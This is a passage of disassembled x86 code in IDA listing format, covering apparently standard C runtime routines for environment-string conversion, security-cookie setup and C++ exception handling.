loc_40AF05: ; CODE XREF: sub_40AE54+65�j
; sub_40AE54+6D�j ...
or eax, 0FFFFFFFFh
loc_40AF08: ; CODE XREF: sub_40AE54+AF�j
pop edi
pop esi
pop ebx
leave
retn
sub_40AE54 endp
; =============== S U B R O U T I N E =======================================
sub_40AF0D proc near ; CODE XREF: .text:00404050�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_426400
push ebx
push ebp
push esi
push edi
mov edi, ds:dword_41D134
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_40AF56
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_40AF3D
mov dword_426400, 1
jmp short loc_40AF5F
; ---------------------------------------------------------------------------
loc_40AF3D: ; CODE XREF: sub_40AF0D+22�j
call ds:dword_41D0F0 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_40AF51
mov eax, ebp
mov dword_426400, eax
jmp short loc_40AF56
; ---------------------------------------------------------------------------
loc_40AF51: ; CODE XREF: sub_40AF0D+39�j
mov eax, dword_426400
loc_40AF56: ; CODE XREF: sub_40AF0D+1A�j
; sub_40AF0D+42�j
cmp eax, 1
jnz loc_40AFE3
loc_40AF5F: ; CODE XREF: sub_40AF0D+2E�j
cmp esi, ebx
jnz short loc_40AF72
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jnz short loc_40AF72
loc_40AF6B: ; CODE XREF: sub_40AF0D+DC�j
; sub_40AF0D+E8�j ...
xor eax, eax
jmp loc_40B03B
; ---------------------------------------------------------------------------
loc_40AF72: ; CODE XREF: sub_40AF0D+54�j
; sub_40AF0D+5C�j
cmp [esi], bx
mov eax, esi
jz short loc_40AF87
loc_40AF79: ; CODE XREF: sub_40AF0D+71�j
; sub_40AF0D+78�j
add eax, ebp
cmp [eax], bx
jnz short loc_40AF79
add eax, ebp
cmp [eax], bx
jnz short loc_40AF79
loc_40AF87: ; CODE XREF: sub_40AF0D+6A�j
mov edi, ds:dword_41D138
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_40AFD8
push ebp
call sub_40773A
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_40AFD8
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_40AFD4
push [esp+18h+var_8]
call sub_403603
pop ecx
mov [esp+18h+var_8], ebx
loc_40AFD4: ; CODE XREF: sub_40AF0D+B7�j
mov ebx, [esp+18h+var_8]
loc_40AFD8: ; CODE XREF: sub_40AF0D+97�j
; sub_40AF0D+A6�j
push esi
call ds:dword_41D13C ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_40B03B
; ---------------------------------------------------------------------------
loc_40AFE3: ; CODE XREF: sub_40AF0D+4C�j
cmp eax, ebp
jz short loc_40AFEB
cmp eax, ebx
jnz short loc_40AF6B
loc_40AFEB: ; CODE XREF: sub_40AF0D+D8�j
call ds:dword_41D140 ; GetEnvironmentStrings
mov esi, eax
cmp esi, ebx
jz loc_40AF6B
cmp [esi], bl
jz short loc_40B009
loc_40AFFF: ; CODE XREF: sub_40AF0D+F5�j
; sub_40AF0D+FA�j
inc eax
cmp [eax], bl
jnz short loc_40AFFF
inc eax
cmp [eax], bl
jnz short loc_40AFFF
loc_40B009: ; CODE XREF: sub_40AF0D+F0�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_40773A
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_40B027
push esi
call ds:dword_41D144 ; FreeEnvironmentStringsA
jmp loc_40AF6B
; ---------------------------------------------------------------------------
loc_40B027: ; CODE XREF: sub_40AF0D+10C�j
push ebp
push esi
push edi
call sub_407BF0
add esp, 0Ch
push esi
call ds:dword_41D144 ; FreeEnvironmentStringsA
mov eax, edi
loc_40B03B: ; CODE XREF: sub_40AF0D+60�j
; sub_40AF0D+D4�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_40AF0D endp
; =============== S U B R O U T I N E =======================================
sub_40B042 proc near ; CODE XREF: .text:loc_40402C�p
push esi
push edi
mov eax, offset dword_421294
mov edi, offset dword_421294
cmp eax, edi
mov esi, eax
jnb short loc_40B063
loc_40B054: ; CODE XREF: sub_40B042+1F�j
mov eax, [esi]
test eax, eax
jz short loc_40B05C
call eax
loc_40B05C: ; CODE XREF: sub_40B042+16�j
add esi, 4
cmp esi, edi
jb short loc_40B054
loc_40B063: ; CODE XREF: sub_40B042+10�j
pop edi
pop esi
retn
sub_40B042 endp
; =============== S U B R O U T I N E =======================================
sub_40B066 proc near ; DATA XREF: sub_407979+3F�o
push esi
push edi
mov eax, offset dword_42129C
mov edi, offset dword_42129C
cmp eax, edi
mov esi, eax
jnb short loc_40B087
loc_40B078: ; CODE XREF: sub_40B066+1F�j
mov eax, [esi]
test eax, eax
jz short loc_40B080
call eax
loc_40B080: ; CODE XREF: sub_40B066+16�j
add esi, 4
cmp esi, edi
jb short loc_40B078
loc_40B087: ; CODE XREF: sub_40B066+10�j
pop edi
pop esi
retn
sub_40B066 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B08A proc near ; CODE XREF: .text:00404118�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_423064
and [ebp+var_8], 0
and [ebp+var_4], 0
push ebx
push edi
mov edi, 0BB40E64Eh
cmp eax, edi
mov ebx, 0FFFF0000h
jz short loc_40B0BA
test eax, ebx
jz short loc_40B0BA
not eax
mov dword_423068, eax
jmp short loc_40B11A
; ---------------------------------------------------------------------------
loc_40B0BA: ; CODE XREF: sub_40B08A+21�j
; sub_40B08A+25�j
push esi
lea eax, [ebp+var_8]
push eax
call ds:dword_41D1A0 ; GetSystemTimeAsFileTime
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call ds:dword_41D194 ; GetCurrentProcessId
xor esi, eax
call ds:dword_41D0E0 ; GetCurrentThreadId
xor esi, eax
call ds:dword_41D108 ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call ds:dword_41D058 ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
cmp esi, edi
jnz short loc_40B100
mov esi, 0BB40E64Fh
jmp short loc_40B10B
; ---------------------------------------------------------------------------
loc_40B100: ; CODE XREF: sub_40B08A+6D�j
test esi, ebx
jnz short loc_40B10B
mov eax, esi
shl eax, 10h
or esi, eax
loc_40B10B: ; CODE XREF: sub_40B08A+74�j
; sub_40B08A+78�j
mov dword_423064, esi
not esi
mov dword_423068, esi
pop esi
loc_40B11A: ; CODE XREF: sub_40B08A+2E�j
pop edi
pop ebx
leave
retn
sub_40B08A endp
; =============== S U B R O U T I N E =======================================
sub_40B11E proc near ; DATA XREF: sub_40B18A�o
; .data:00423060�o ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
mov eax, [edi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_40B157
cmp dword ptr [eax+10h], 3
jnz short loc_40B157
mov eax, [eax+14h]
cmp eax, 19930520h
jz short loc_40B152
cmp eax, 19930521h
jz short loc_40B152
cmp eax, 19930522h
jz short loc_40B152
cmp eax, 1994000h
jnz short loc_40B157
loc_40B152: ; CODE XREF: sub_40B11E+1D�j
; sub_40B11E+24�j ...
call sub_40BE59
loc_40B157: ; CODE XREF: sub_40B11E+D�j
; sub_40B11E+13�j ...
cmp byte_426408, 0
push esi
jz short loc_40B183
push dword_426404
call sub_405193
mov esi, eax
test esi, esi
pop ecx
jz short loc_40B183
push esi
call sub_4101B0
test eax, eax
pop ecx
jz short loc_40B183
push edi
call esi
jmp short loc_40B185
; ---------------------------------------------------------------------------
loc_40B183: ; CODE XREF: sub_40B11E+41�j
; sub_40B11E+53�j ...
xor eax, eax
loc_40B185: ; CODE XREF: sub_40B11E+63�j
pop esi
pop edi
retn 4
sub_40B11E endp
; =============== S U B R O U T I N E =======================================
sub_40B18A proc near ; DATA XREF: .rdata:0041D2D4�o
push offset sub_40B11E
call ds:dword_41D19C ; SetUnhandledExceptionFilter
push eax
call sub_405127
mov dword_426404, eax
pop ecx
mov byte_426408, 1
xor eax, eax
retn
sub_40B18A endp
; =============== S U B R O U T I N E =======================================
sub_40B1AB proc near ; DATA XREF: .rdata:0041D2F0�o
cmp byte_426408, 0
jz short locret_40B1CE
push dword_426404
call sub_405193
pop ecx
push eax
call ds:dword_41D19C ; SetUnhandledExceptionFilter
mov byte_426408, 0
locret_40B1CE: ; CODE XREF: sub_40B1AB+7�j
retn
sub_40B1AB endp
; =============== S U B R O U T I N E =======================================
sub_40B1CF proc near ; DATA XREF: .rdata:004216E8�o
mov dword ptr [ecx], offset off_41DC24
jmp sub_402CCA
sub_40B1CF endp
; =============== S U B R O U T I N E =======================================
sub_40B1DA proc near ; DATA XREF: .rdata:off_41DC24�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41DC24
call sub_402CCA
test [esp+4+arg_0], 1
jz short loc_40B1F6
push esi
call sub_402F6D
pop ecx
loc_40B1F6: ; CODE XREF: sub_40B1DA+13�j
mov eax, esi
pop esi
retn 4
sub_40B1DA endp
; =============== S U B R O U T I N E =======================================
sub_40B1FC proc near ; CODE XREF: sub_40B43B+4E�p
; sub_40BA07+21A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_40B252
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_40B252
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_40B230
add ecx, 8
push ecx
push edx
call sub_407FD0
test eax, eax
pop ecx
pop ecx
jz short loc_40B230
loc_40B22C: ; CODE XREF: sub_40B1FC+3C�j
; sub_40B1FC+4B�j ...
xor eax, eax
jmp short loc_40B255
; ---------------------------------------------------------------------------
loc_40B230: ; CODE XREF: sub_40B1FC+1E�j
; sub_40B1FC+2E�j
test byte ptr [esi], 2
jz short loc_40B23A
test byte ptr [edi], 8
jz short loc_40B22C
loc_40B23A: ; CODE XREF: sub_40B1FC+37�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_40B249
test byte ptr [edi], 1
jz short loc_40B22C
loc_40B249: ; CODE XREF: sub_40B1FC+46�j
test al, 2
jz short loc_40B252
test byte ptr [edi], 2
jz short loc_40B22C
loc_40B252: ; CODE XREF: sub_40B1FC+B�j
; sub_40B1FC+13�j ...
xor eax, eax
inc eax
loc_40B255: ; CODE XREF: sub_40B1FC+32�j
pop edi
pop esi
retn
sub_40B1FC endp
; =============== S U B R O U T I N E =======================================
sub_40B258 proc near ; CODE XREF: sub_40B29C+85�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0E0434F4Dh
jz short loc_40B27F
cmp eax, 0E06D7363h
jnz short loc_40B299
call sub_40539D
and dword ptr [eax+90h], 0
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B27F: ; CODE XREF: sub_40B258+D�j
call sub_40539D
cmp dword ptr [eax+90h], 0
jle short loc_40B299
call sub_40539D
add eax, 90h
dec dword ptr [eax]
loc_40B299: ; CODE XREF: sub_40B258+14�j
; sub_40B258+33�j
xor eax, eax
retn
sub_40B258 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B29C proc near ; CODE XREF: sub_40B4FD+EC�p
; sub_40B8A9+36�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset dword_4215E0
call __SEH_prolog4
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
cmp dword ptr [edi+4], 80h
jg short loc_40B2BD
movsx esi, byte ptr [ebx+8]
jmp short loc_40B2C0
; ---------------------------------------------------------------------------
loc_40B2BD: ; CODE XREF: sub_40B29C+19�j
mov esi, [ebx+8]
loc_40B2C0: ; CODE XREF: sub_40B29C+1F�j
mov [ebp+var_1C], esi
call sub_40539D
add eax, 90h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
loc_40B2D3: ; CODE XREF: sub_40B29C+9F�j
cmp esi, [ebp+arg_C]
jz short loc_40B33D
cmp esi, 0FFFFFFFFh
jle short loc_40B2E2
cmp esi, [edi+4]
jl short loc_40B2E7
loc_40B2E2: ; CODE XREF: sub_40B29C+3F�j
call sub_40BEA5
loc_40B2E7: ; CODE XREF: sub_40B29C+44�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_40B318
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_40BEF0
loc_40B318: ; CODE XREF: sub_40B29C+65�j
and [ebp+ms_exc.disabled], 0
jmp short loc_40B338
; ---------------------------------------------------------------------------
loc_40B31E: ; DATA XREF: .rdata:00421600�o
push [ebp+ms_exc.exc_ptr]
call sub_40B258
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40B328: ; DATA XREF: .rdata:00421604�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_40B338: ; CODE XREF: sub_40B29C+80�j
mov [ebp+var_1C], esi
jmp short loc_40B2D3
; ---------------------------------------------------------------------------
loc_40B33D: ; CODE XREF: sub_40B29C+3A�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40B362
cmp esi, [ebp+arg_C]
jz short loc_40B353
call sub_40BEA5
loc_40B353: ; CODE XREF: sub_40B29C+B0�j
mov [ebx+8], esi
call __SEH_epilog4
retn
sub_40B29C endp
; =============== S U B R O U T I N E =======================================
sub_40B35C proc near ; DATA XREF: .rdata:004215F8�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_40B35C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B362 proc near ; CODE XREF: sub_40B29C+A8�p
call sub_40539D
cmp dword ptr [eax+90h], 0
jle short locret_40B37C
call sub_40539D
add eax, 90h
dec dword ptr [eax]
locret_40B37C: ; CODE XREF: sub_40B362+C�j
retn
sub_40B362 endp
; =============== S U B R O U T I N E =======================================
sub_40B37D proc near ; CODE XREF: sub_40B4FD+93�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_40B3BF
cmp dword ptr [eax+10h], 3
jnz short loc_40B3BF
mov ecx, [eax+14h]
cmp ecx, 19930520h
jz short loc_40B3A8
cmp ecx, 19930521h
jz short loc_40B3A8
cmp ecx, 19930522h
jnz short loc_40B3BF
loc_40B3A8: ; CODE XREF: sub_40B37D+19�j
; sub_40B37D+21�j
cmp dword ptr [eax+1Ch], 0
jnz short loc_40B3BF
call sub_40539D
xor ecx, ecx
inc ecx
mov [eax+20Ch], ecx
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40B3BF: ; CODE XREF: sub_40B37D+8�j
; sub_40B37D+E�j ...
xor eax, eax
retn
sub_40B37D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B3C2 proc near ; CODE XREF: sub_406640+112�p
; sub_40B623+6E�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421608
call __SEH_prolog4
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short loc_40B3FF
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_40B3FF
mov eax, [ecx+1Ch]
test eax, eax
jz short loc_40B3FF
mov eax, [eax+4]
test eax, eax
jz short loc_40B3FF
and [ebp+ms_exc.disabled], 0
push eax
push dword ptr [ecx+18h]
call sub_404235
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40B3FF: ; CODE XREF: sub_40B3C2+11�j
; sub_40B3C2+19�j ...
call __SEH_epilog4
retn
sub_40B3C2 endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_40BE59
; =============== S U B R O U T I N E =======================================
sub_40B416 proc near ; CODE XREF: sub_40B699+86�p
; sub_40B699+113�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [ecx]
push esi
mov esi, [esp+4+arg_0]
add eax, esi
cmp dword ptr [ecx+4], 0
jl short loc_40B439
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_40B439: ; CODE XREF: sub_40B416+11�j
pop esi
retn
sub_40B416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B43B proc near ; CODE XREF: sub_40BA07+111�p
; sub_40BA07+2AE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
test edi, edi
jnz short loc_40B44F
call sub_40BEA5
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B44F: ; CODE XREF: sub_40B43B+8�j
and [ebp+var_8], 0
cmp dword ptr [edi], 0
mov [ebp+var_1], 0
jle short loc_40B4AF
push ebx
push esi
loc_40B45E: ; CODE XREF: sub_40B43B+70�j
mov eax, [ebp+arg_0]
mov eax, [eax+1Ch]
mov eax, [eax+0Ch]
mov ebx, [eax]
test ebx, ebx
lea esi, [eax+4]
jle short loc_40B4A3
mov eax, [ebp+var_8]
shl eax, 4
mov [ebp+var_C], eax
loc_40B479: ; CODE XREF: sub_40B43B+60�j
mov ecx, [ebp+arg_0]
push dword ptr [ecx+1Ch]
mov eax, [esi]
push eax
mov eax, [edi+4]
add eax, [ebp+var_C]
push eax
call sub_40B1FC
add esp, 0Ch
test eax, eax
jnz short loc_40B49F
dec ebx
add esi, 4
test ebx, ebx
jg short loc_40B479
jmp short loc_40B4A3
; ---------------------------------------------------------------------------
loc_40B49F: ; CODE XREF: sub_40B43B+58�j
mov [ebp+var_1], 1
loc_40B4A3: ; CODE XREF: sub_40B43B+33�j
; sub_40B43B+62�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [edi]
jl short loc_40B45E
pop esi
pop ebx
loc_40B4AF: ; CODE XREF: sub_40B43B+1F�j
mov al, [ebp+var_1]
leave
retn
sub_40B43B endp
; =============== S U B R O U T I N E =======================================
sub_40B4B4 proc near ; CODE XREF: sub_40BA07+30A�p
push 4
mov eax, offset loc_41C1EE
call sub_4045FF
call sub_40539D
cmp dword ptr [eax+94h], 0
jz short loc_40B4D3
call sub_40BEA5
loc_40B4D3: ; CODE XREF: sub_40B4B4+18�j
and dword ptr [ebp-4], 0
call sub_40BE92
or dword ptr [ebp-4], 0FFFFFFFFh
jmp sub_40BE59
sub_40B4B4 endp
; =============== S U B R O U T I N E =======================================
sub_40B4E5 proc near ; DATA XREF: .rdata:00421630�o
call sub_40539D
mov ecx, [ebp+8]
push 0
push 0
mov [eax+94h], ecx
call sub_4041BB
int 3 ; Trap to Debugger
sub_40B4E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B4FD proc near ; CODE XREF: sub_40B8A9+57�p
var_3C = byte ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0040B618 SIZE 00000005 BYTES
push 2Ch
push offset dword_421680
call __SEH_prolog4
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_34], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_3C]
push eax
call sub_4044D9
pop ecx
pop ecx
mov [ebp+var_28], eax
call sub_40539D
mov eax, [eax+88h]
mov [ebp+var_2C], eax
call sub_40539D
mov eax, [eax+8Ch]
mov [ebp+var_30], eax
call sub_40539D
mov [eax+88h], esi
call sub_40539D
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
and [ebp+ms_exc.disabled], 0
xor eax, eax
inc eax
mov [ebp+arg_8], eax
mov [ebp+ms_exc.disabled], eax
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_40456E
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp short loc_40B5FC
; ---------------------------------------------------------------------------
loc_40B58D: ; DATA XREF: .rdata:004216A0�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_40B37D
retn
; ---------------------------------------------------------------------------
loc_40B596: ; DATA XREF: .rdata:004216A4�o
mov esp, [ebp+ms_exc.old_esp]
call sub_40539D
and dword ptr [eax+20Ch], 0
mov esi, [ebp+arg_C]
mov edi, [ebp+arg_4]
cmp dword ptr [esi+4], 80h
jg short loc_40B5BA
movsx ecx, byte ptr [edi+8]
jmp short loc_40B5BD
; ---------------------------------------------------------------------------
loc_40B5BA: ; CODE XREF: sub_40B4FD+B5�j
mov ecx, [edi+8]
loc_40B5BD: ; CODE XREF: sub_40B4FD+BB�j
mov ebx, [esi+10h]
and [ebp+var_20], 0
loc_40B5C4: ; CODE XREF: sub_40B4FD+11E�j
mov eax, [ebp+var_20]
cmp eax, [esi+0Ch]
jnb short loc_40B5E4
imul eax, 14h
add eax, ebx
mov edx, [eax+4]
cmp ecx, edx
jle short loc_40B618
cmp ecx, [eax+8]
jg short loc_40B618
mov eax, [esi+8]
mov ecx, [eax+edx*8+8]
loc_40B5E4: ; CODE XREF: sub_40B4FD+CD�j
push ecx
push esi
push 0
push edi
call sub_40B29C
add esp, 10h
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
loc_40B5FC: ; CODE XREF: sub_40B4FD+8E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov [ebp+arg_8], 0
call sub_40B623
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40B4FD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40B4FD
loc_40B618: ; CODE XREF: sub_40B4FD+D9�j
; sub_40B4FD+DE�j
inc [ebp+var_20]
jmp short loc_40B5C4
; END OF FUNCTION CHUNK FOR sub_40B4FD
; =============== S U B R O U T I N E =======================================
sub_40B61D proc near ; DATA XREF: .rdata:00421698�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_40B61D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B623 proc near ; CODE XREF: sub_40B4FD+10D�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-28h]
call sub_404522
pop ecx
call sub_40539D
mov ecx, [ebp-2Ch]
mov [eax+88h], ecx
call sub_40539D
mov ecx, [ebp-30h]
mov [eax+8Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_40B698
cmp dword ptr [esi+10h], 3
jnz short locret_40B698
mov eax, [esi+14h]
cmp eax, 19930520h
jz short loc_40B674
cmp eax, 19930521h
jz short loc_40B674
cmp eax, 19930522h
jnz short locret_40B698
loc_40B674: ; CODE XREF: sub_40B623+41�j
; sub_40B623+48�j
cmp dword ptr [ebp-34h], 0
jnz short locret_40B698
cmp dword ptr [ebp-1Ch], 0
jz short locret_40B698
push dword ptr [esi+18h]
call sub_404501
pop ecx
test eax, eax
jz short locret_40B698
push dword ptr [ebp+10h]
push esi
call sub_40B3C2
pop ecx
pop ecx
locret_40B698: ; CODE XREF: sub_40B623+31�j
; sub_40B623+37�j ...
retn
sub_40B623 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B699 proc near ; CODE XREF: sub_40B818+36�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset dword_4216A8
call __SEH_prolog4
xor edx, edx
mov [ebp+var_1C], edx
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
cmp ecx, edx
jz loc_40B810
cmp [ecx+8], dl
jz loc_40B810
mov ecx, [eax+8]
cmp ecx, edx
jnz short loc_40B6D4
test dword ptr [eax], 80000000h
jz loc_40B810
loc_40B6D4: ; CODE XREF: sub_40B699+2D�j
mov eax, [eax]
mov esi, [ebp+arg_4]
test eax, eax
js short loc_40B6E1
lea esi, [ecx+esi+0Ch]
loc_40B6E1: ; CODE XREF: sub_40B699+42�j
mov [ebp+ms_exc.disabled], edx
xor ebx, ebx
inc ebx
push ebx
test al, 8
jz short loc_40B72D
mov edi, [ebp+arg_0]
push dword ptr [edi+18h]
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
mov eax, [edi+18h]
mov [esi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_40B71E: ; CODE XREF: sub_40B699+E7�j
push eax
call sub_40B416
pop ecx
pop ecx
mov [esi], eax
jmp loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B72D: ; CODE XREF: sub_40B699+51�j
mov edi, [ebp+arg_C]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
test [edi], bl
jz short loc_40B782
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push dword ptr [edi+14h]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push esi
call sub_407370
add esp, 0Ch
cmp dword ptr [edi+14h], 4
jnz loc_40B7F8
mov eax, [esi]
test eax, eax
jz short loc_40B7F8
add edi, 8
push edi
jmp short loc_40B71E
; ---------------------------------------------------------------------------
loc_40B782: ; CODE XREF: sub_40B699+9F�j
cmp [edi+18h], edx
jnz short loc_40B7BF
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push dword ptr [edi+14h]
add edi, 8
push edi
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push esi
call sub_407370
add esp, 0Ch
jmp short loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B7BF: ; CODE XREF: sub_40B699+EC�j
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push dword ptr [edi+18h]
call sub_4101B0
pop ecx
test eax, eax
jz short loc_40B7F3
test byte ptr [edi], 4
push 0
pop eax
setnz al
inc eax
mov [ebp+var_1C], eax
jmp short loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B7F3: ; CODE XREF: sub_40B699+62�j
; sub_40B699+73�j ...
call sub_40BEA5
loc_40B7F8: ; CODE XREF: sub_40B699+8F�j
; sub_40B699+D7�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
jmp short loc_40B812
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B810: ; CODE XREF: sub_40B699+19�j
; sub_40B699+22�j ...
xor eax, eax
loc_40B812: ; CODE XREF: sub_40B699+169�j
call __SEH_epilog4
retn
sub_40B699 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B818 proc near ; CODE XREF: sub_40B8A9+11�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 8
push offset dword_4216C8
call __SEH_prolog4
mov eax, [ebp+arg_8]
test dword ptr [eax], 80000000h
jz short loc_40B834
mov ebx, [ebp+arg_4]
jmp short loc_40B83E
; ---------------------------------------------------------------------------
loc_40B834: ; CODE XREF: sub_40B818+15�j
mov ecx, [eax+8]
mov edx, [ebp+arg_4]
lea ebx, [ecx+edx+0Ch]
loc_40B83E: ; CODE XREF: sub_40B818+1A�j
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_C]
push esi
push eax
push [ebp+arg_4]
mov edi, [ebp+arg_0]
push edi
call sub_40B699
add esp, 10h
dec eax
jz short loc_40B878
dec eax
jnz short loc_40B890
push 1
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_404235
jmp short loc_40B890
